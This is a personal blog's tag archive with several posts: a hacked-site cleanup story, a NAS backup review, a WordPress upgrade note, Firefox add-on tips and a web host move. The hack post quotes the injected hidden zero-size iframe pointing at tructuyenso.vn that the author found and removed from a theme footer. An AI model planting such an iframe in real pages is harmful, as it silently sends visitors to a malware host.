Tag Archive: FTP

Hacked – I was a possible Malware Site for tructuyenso.vn!

Introduction

A few days ago I got hacked.  I quickly ripped out a heap of dodgy files left by the hackers but for some days now, Firefox, my browser, while viewing pages on this website, has been saying that it’s “downloading data from tructuyenso.vn… “.

.htaccess

This, of course, was not actually happening, as I’ve put the blockers on the whole of Vietnam using .htaccess!  The reason for this is that initially, tructuyenso wasn’t the only site appearing in the progress tip – there was another which lasted until I got rid of the various files dumped on my website.  This is how:

<Limit GET POST>
order allow,deny
deny from 112.0.0.0/8
allow from all
</Limit>

However, the call was still being made from somewhere on my site as the progress indicator wouldn’t stop….

Site5 Search

A search for the string “tructuyenso.vn” turned up nothing in the files on my website using my website host’s file manager.  (In the end, this was my failing and I will not rely on the thing again!)

A search through my database also turned up zero.

TCPView

TCPView is a download from Sysinternals.com  (now Microsoft!) that shows the various net connections being made to one’s PC from everywhere.  This immediately showed that as soon as the main strangelyperfect.tv website (not the backend WordPress admin area), fired up in Firefox, as many as 7 connections were simultaneously made to 112.78.15.230……  This is the IP address that holds tructuyenso.vn, plus 11 other domains, some of which I’d seen flash through the progress bar.

Even when closed by TCPView, the connections would immediately start up again to the same IP address, 112.78.15.230  (manually closing strangelyperfect.tv stopped the connections).

Reverse IP on tructuyenso.vn

Reverse IP on tructuyenso.vn

YouGetSignal.com shows the domains up nicely in the screenshot above..

Result!

Finding nowt anywhere and Google searches providing zilch on the website in question except in Vietnamese, I turned to the WordPress Codex, specifically, https://codex.wordpress.org/FAQ_My_site_was_hacked

I had of course previously changed my FTP, mySQL databaase and site management passwords, but the link at the bottom to a Website malware & blacklist scan (Sucuri) was the killer!  On visiting Sucuri, it instantly said that I was acting as a host for malware and gave the offending results, for free! (Of course, I wasn’t hosting malware – just that it gave an indication that I was and hence the slowness of the site to load as it tried and failed to download shite my way from Vietnam)

This is their take on it: http://sucuri.net/malware/malware-entry-mwiframehd202

Final Cause and Clean Up

Checking the source code for my homepage (which in retrospect I should have done first!!) threw up “tructuyenso.vn” right at the very bottom.  This is the code as it was when I checked:

<a href="http://tructuyenso.vn" title="Quang cao truc tuyen | Ban hang truc tuyen | Dien dan quang cao truc tuyen" > Quang cao truc tuyen</a>
<iframe marginWidth="0" marginHeight="0" frameBorder="0" width="0" height="0" bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0" nosize scrolling="no" src="http://tructuyenso.vn/"></iframe>
</body>
</html>

This was then easily traced to the footer.php file in my theme, Suffusion.

It was simply stripped out and the website then worked fine…..  but to be sure, I have downloaded then checked the footer file in a fresh theme download to be sure – it’s clean!  I then uploaded a whole clean Suffusion theme in it’s entirety just in case any other theme files were compromised during the original hack yet were dormant, waiting for a trigger.

A recheck on Securi shows my website to be okay now.  See screendump below.   I’ll be using Securi  a lot more!

Securi Site Check

Securi Site Check

Related Posts:

Comments are closed

What is the Best Backup for Windows in a Small Home or Office?

What is the Best Backup for Windows in a Small Home or Office?

Which Windows Backup?  A History.

Over the years I’ve tried many systems for backing up crucial Windows data.  Currently for small-scale backups I use the ubiquitous and almost bullet-proof flash drives, my current one tipping the scales at 8Gb.  But for major backups, as the years have passed, I’ve used;

  1. Floppy discs – 1.4Mb
  2. Iomega Zip discs – 100Mb
  3. CDRW – 650Mb
  4. DVD-R – 4.7Gb
  5. Western Digital My Book Home Edition – 1Tb

They all had their problems and limitations.  The last one looked good with Firewire, USB2, ethernet  & eSATA connections – but it overheated and broke…..

Best Windows Backup!

My current system is from Synology and is a “DS210j – Budget-friendly 2-bay NAS server for Home and Small Business”

See: http://www.synology.com/enu/products/DS210j/index.php

I can heartily recommend the thing.  It has so much gubbins within it and far exceeds my limited expectations.  I installed two green 2Tb drives from Western Digital  in mirrored RAID for security and use the auto-backup software provided as well as Windows’ own.  This is extremely relevant for the large number of hits I’ve had to this posting where a major part of the problem is the time taken to do a backup!  In my case, the 750Gb just takes a few hours to copy across the Gigabit speed ethernet that the unit can use.

Addendum June 2011: The tool is a seriously capable bit of kit and I cannot recommend it enough. Get one!

It does everything it says on the tin, and more!  The whole thing cost me about 200 quid, plus an hour of my time to install.

Even its firewall is more configurable than any router I’ve used!  It can be used as a server for FTP or the web.  It comes with software for a host of things that mimic Flikr etc but without all the privacy or security issues inherent in off-line storage.  It’ll also run with any operating system because it itself is a mini-linux installation as it is,  and includes Windows, Apple and Linux applications.
Check it out, straight from their overview page:

Build Your Entertainment Center

Download Station 2 functions as a 24×7 BitTorrent, FTP, HTTP, eMule, and NZB download center. RapidShare and RSS download are now supported.

DLNA Compliant Media Sever ensures compatibility and interoperability between Disk Station and a wide range of DLNA-certified home devices.

iTunes Server provides an easy way to share music and videos with other iTunes clients within the local network. You can create playlists with songs that match the criteria you specified, and best of all, iTunes will update these playlists automatically as you add or delete songs.

Audio Station supports music, Internet radio stations, and iPod playback with connected USB speakers. Web-streaming mode allows your music to be shared with multiple users over the Internet.

Back Up Your Precious Data

DSM 2.2 offers comprehensive solutions for you to back up data stored on Disk Station or your desktop computer to the Disk Station.

Server backup includes two alternatives: Network Backup and Local Backup. Both allow you to back up data in the shared folders and databases. Incremental backup option and flexible schedules are available. All can be easily configured with a step-by-step wizard.

Desktop backup provides Windows PC users with the Synology Data Replicator 3 for backing up desktop data, Outlook, and Outlook Express emails to their Disk Station by choosing one of the three backup modes: Immediate, Sync, and Scheduled backup, while Mac OS X users can use Apple Time Machine backup application to back up their critical data to Disk Station.

USBCopy allows you to quickly back up your data from an USB storage device such as an USB flash or USB card reader to the Disk Station with just one single touch on the front-panel Copy button.

Enrich Your Web Presence

Photo Station 3 simplifies photo, video, and blog sharing over the Internet. The flexibility of photo theme customization, blog layout arrangement, visitor’s privilege setting, RSS feed, and the dazzling 3-dimentional photo browsing with Cooliris make Photo Station 3 your state-of-the-art lifestyle sharing center on the Internet.

Web Station with built-in PHP+MySQL allows users to publish their own websites or install numerous popular open-source programs.

Access With Your iPhone/Mobile Device

The iPhone App DS audio allows Disk Station users to stream music stored on Disk Station with their iPhone/iPod® touch where Internet access is available, while DS photo allows uploading photos from the iPhone/iPod® touch to their Disk Station.

Users with a mobile device running on Windows Mobile® 6.0, iPhone OS 2.2.1 onward, or Symbian OS 9.1 can log on their Disk Station to view photos with Mobile Photo Station and read supported file formats with Mobile File Station where Internet access is available.

Eco Friendly

Eco Friendly

Synology Disk Station is designed and developed perpetually with the concept of energy saving. Compared with average PC counterparts, Synology Disk Station consumes a relatively low amount of power and has the HDDs hibernate when not in use. This not only helps to save energy but also extends the lifespan of the hard disk.

Synology Disk Station truly earns the title of “green product” because of the unique Scheduled Power On/Off feature, and the smart fan design effectively cools down the system with minimum power consumption, yet keeps the system quiet on operation.

Finally, all Synology products are produced with RoHS compliant parts and packed with recyclable packing materials. Synology recognizes its responsibility as a global citizen and is continually working to reduce the environmental impact of the products we create.

Related Posts:

Comments are closed

WordPress Now at 3 Point Oh!

Strangely post on June 18th, 2010
Posted in Internet Tags: , , , , , , , , , ,

WordPress Upgraded

Following the internal  prompts, I’ve now upgraded all my WordPress installations to version 3.

Only one site didn’t want to ‘take’ using the upgrade button so I had to do it the old FTP upload method.  For all of them, after checking wp-config.php I’ve discovered that a whole new raft of security passwords have been implemented.  These needed generating and pasting into each wp-config file.

These are handily available here, https://api.wordpress.org/secret-key/1.1/salt/ and refreshing the page generates a new set of codes to paste into each website (we don’t want the same one now, do we? !!)  This is a sample output:

define('AUTH_KEY',         '{p5hDGT(#P8<h^*7)a_[83Z{bg3BW8zx,+DF-^b[j#=B5s]LDa3 Oj`_Z;s}$j)&');
define('SECURE_AUTH_KEY',  '? rNH,,8|v+{+tT1)#PQ@~_04}gSq1G/,||QbCIz-6le0JF})_mAOjj7}j!rkX*%');
define('LOGGED_IN_KEY',    'bJy+b}XgZhz&?DBJPCtjiC)S3w+y&9WIeR-LU{$O/Pm$g_z*]I|4D7ciK94IrEr0');
define('NONCE_KEY',        '8KK7=E~83:g:r,obk R98{JOm6juB^b,Q/$2Q?~&#]gidTxJD;}JB;|?ydn(:iR$');
define('AUTH_SALT',        'VpR<E<[email protected]%_cHTf+#esj^R8*$pQ}I?&6,w!I`Jxrz?=BQA$j|(C95)');
define('SECURE_AUTH_SALT', 'e=k{+sqg@/4e-~fRV:@jH9lHqfy^M7HvVkp=MeRc)uQOT e#$K2)!8G7urN[STm>');
define('LOGGED_IN_SALT',   'vx<n#NJqb&[email protected]; -DWQ)pDy#137z3ga#q4$odysCbnRlnp_N,c_seMZ9pP|');
define('NONCE_SALT',       '1+uBKH,=0tEP$p)0Cfdr*tQ|<|l1dN@tHtZo->GeQIj*]Xt9Moc XuJG7`>?.~dG');

Things to Do

If you checked out the video you’ll have seen a heap of new things.

The big things for me are,

  • the custom menu structure
  • the easy potential for one WordPress installation to manage all my sites – millions as they say!

The advantage of the latter is a much simpler upgrade path for WordPress – i.e. one instead of many, with all that that entails.

So things to do are;

  • Make a multi-website WordPress system
  • Redo all themes as the current crop do not support the custom menu structure

…er…  that’s it for now.

Related Posts:

Five Fabulous Firefox Add-ons

Firefox Add-ons: What is an Add-on?

First things first.  It’s now well known among the more savvy internet users, that the Firefox web browser is a fine piece of kit; secure, innovative and with a burgeoning user base that has seen Microsoft rise from it’s slumbers and put some serious damage control development into it’s venerable Internet Explorer.

Spread Firefox Affiliate ButtonBut part of the reason for the rise of Firefox, is it’s ease of installing small lumps of code by the user – called Add-ons.  These can do many things – weather, stocks, pictures, FTP clients…..  there are thousands now.  Visit the add-ons page and they are grouped into various categories.

Add-ons are made by a host of mainly unpaid software designers.  The code is generally open source so that anyone can modify it for their own needs.  The reality for me is that I use something if it works, and ditch it if it doesn’t!  I haven’t the spare time for code work…

So What to Choose?

Now there’s the rub!  The best thing is to install some that fall into your area of interest, have a play, remove them and try some more!  You’ll soon find out which have the features you want, are fast, and don’t crash your browser!

To install, just click on the add-on link, wait a couple of seconds for the countdown timer and then install.  Usually that’s all there is to it.

For myself, I’m not that interested in the many ‘consumer’ type add-ons (like music listings and Facebook notifiers etc) , but I’m interested in things that improve my coding and browsing life, or help me produce articles like this one!

My Recommendations


British English Dictionary – link

FirefoxDictionaryCheck

Firefox Dictionary Check

Used when blogging or commenting to correct spelling!  That’s a screen-dump above of it working.

Words can also be added – and it’s all on the right-click!


Screengrab – link

Screengrab Menu

Screengrab Menu

The best ‘printscreen’ utility I’ve come across.  Use it to get screen captures of dodgy websites before they are closed down!

I have it set for an icon in the lower right corner of a window, then the two menus shoot out sideways.

As with the dictionary, the menus are on the right-click as well.


SearchStatus – link

SearchStatus menu

SearchStatus menu

I have the info strung out at the bottom right of my window again.  The maker’s description says most of it,(copied verbatim below),  but it doesn’t say how useful and fast some of these features are!

Display the Google PageRank, Alexa rank, Compete ranking and SEOmoz Linkscape mozRank anywhere in your browser, along with fast keyword density analyser, keyword/nofollow highlighting, backward/related links, Alexa info and more

In essence, for me, it’s a neat, quick and configurable WHOIS lookup for any domain you’re visiting plus a wodge of bells and whistles.


TinEye Reverse Image Search – link

TinEye Menu

TinEye Menu

Another right-click menu system!  The add-on looks for images that have been found in it’s web trawling that match the image you right-click selected.

7 results - TinEye

7 results – TinEye

This works even when the image has been edited, cut, cropped, renamed or resized!

This is the menu applied to a picture from the Crawling Chaos ‘The Gas Chair’ page.  After a few seconds, the TinEye website fires up in a new tab with a list of pages that include the picture.  It’s catalogue isn’t complete but it’s getting bigger all the time…


Web Developer – link

WebDeveloperMenu

Web Developer Menu

The enormity of the menu systems and the features it includes mean that there’s no way I could do justice to it in this small piece.  As a small example, let’s see it show all the web colours on the same Crawling Chaos page  above….

Color-Information-http-crawlingchaos.co.uk etc

Color-Information-http-crawlingchaos.co.uk etc

Again, all features are available as a right-click,but also as a tool-bar menu if desired.

If I now check the ‘View Color Information’ entry, after a second or so, another tab fires up in Firefox and displays all the web-page colours defined in code using the colour code RGB hash style.

You can get all sorts of information about a web page and it’s images.

One neat thing I use all the time is the “Resize” feature which means I can set the browser to various pixel dimensions to see how web pages look at these different sizes!

But really, check out the menus for yourself.  there’s just TOO much to list!


#6 Add-on: Firebug – link

Not quite top 5 for me, but Firebug offers a wealth of coding opportunities and allows you to see the code that generates the various on-screen elements, and also allows real-time editing to see what changes would do to a page – but without opening the page up in an editor locally, or otherwise. It’s all on-the-fly.  I don’t always have it installed as sometimes their codebase doesn’t work properly when Firefox upgrades….

IE8 has similar inbuilt feature now – perhaps Microsoft are trying hard with the developer community and can see that this is a good way to regain the initiative?


Spread Firefox Affiliate Button

Related Posts:

It’s Time to Move

Introduction

  • So it’s time to move…
  • It’s time to get down with it…
  • It’s time to testify..
  • …and I want to know…
  • ARE YOU READY TO TESTIFY?
  • Brothers and sisters…
  • I give you..
  • A testimonial…
  • The MC5!

With a vague resemblance to my personal life and status, and a bit like “technology mirroring life”, this domain will shortly be getting legs and pushing off to a new webhost.

I’ve become increasingly frustrated at the continuing dropouts and waits from my current host, ixWebhosting.  They were okay when I first started on this yabberring into space life, but now, in a typical pitmatic Northumberland phrase, it’s become:

Hard to Bear

This phrase closely mirrors my personal status – initial relationship,bright hopes for the future, increasing frustration, hard to bear – but I’ll leave it at that.

Webhosting

Funnily enough, while checking through the many hosting companies, one in particular made me quake somewhat.  This one is BlueHost.  It looked okay until I saw the address as:

Bluehost Inc.
1958 South 950 East
Provo, UT 84606

Now they may be all fine and dandy, but I’ve seen some pretty dodgy shit hanging around UTAH over the last three months.  It’s not all fresh air and snowy mountains by a long chalk  I can tell you,  after my numerous investigations into Google Treasure Chest and other related scams…  So they are out!

Search Problems

Finding a new web hosting service is a bit like Russian Roulette, actually.  It’s almost as bad as the Google scammers as virtually all reviews are loaded and/or fictional.  Honest truth is very hard to find.  The only way to tell is to jump in and test the boiling snake oil!

So what I have done, is to check hosts from sites that I “trust” and use, making a mental check of any downtimes I’ve come across and noting the general speed of these sites, as that’s important.  (I know my site is overloaded with crap, but hey – I hate chucking stuff out!)

So I’ve plumped for Site5.   Only time will tell if I’ve made the right choice.  It’s servers are in Texas but it’s registered in Colorado – yeeHaH

I’ve got a while to play with stuff.  The backend user interface is totally different to the current setup so it’s another learning experience for me.  The only bit the same is phpAdmin, although they use a newer version with a claimed 50Meg upload size for database imports!

Then it’s a question of copying files, setting FTP, setting emails, setting up databases, installing WordPress, re-jigging wp-config for better security and finally, changing the DNS pointers etc at my domain name registrar.  Maybe I’ll move all images to another domain for faster page loading…?

So I won’t be posting much while I’m doing this, and hopefully, with a nice bit of luck on top of my planning, the site won’t be down for too long while waiting for domain propagation….  Watch this space!

Related Posts:

Comments are closed

© 2007-2017 Strangely Perfect All Rights Reserved -- Copyright notice by me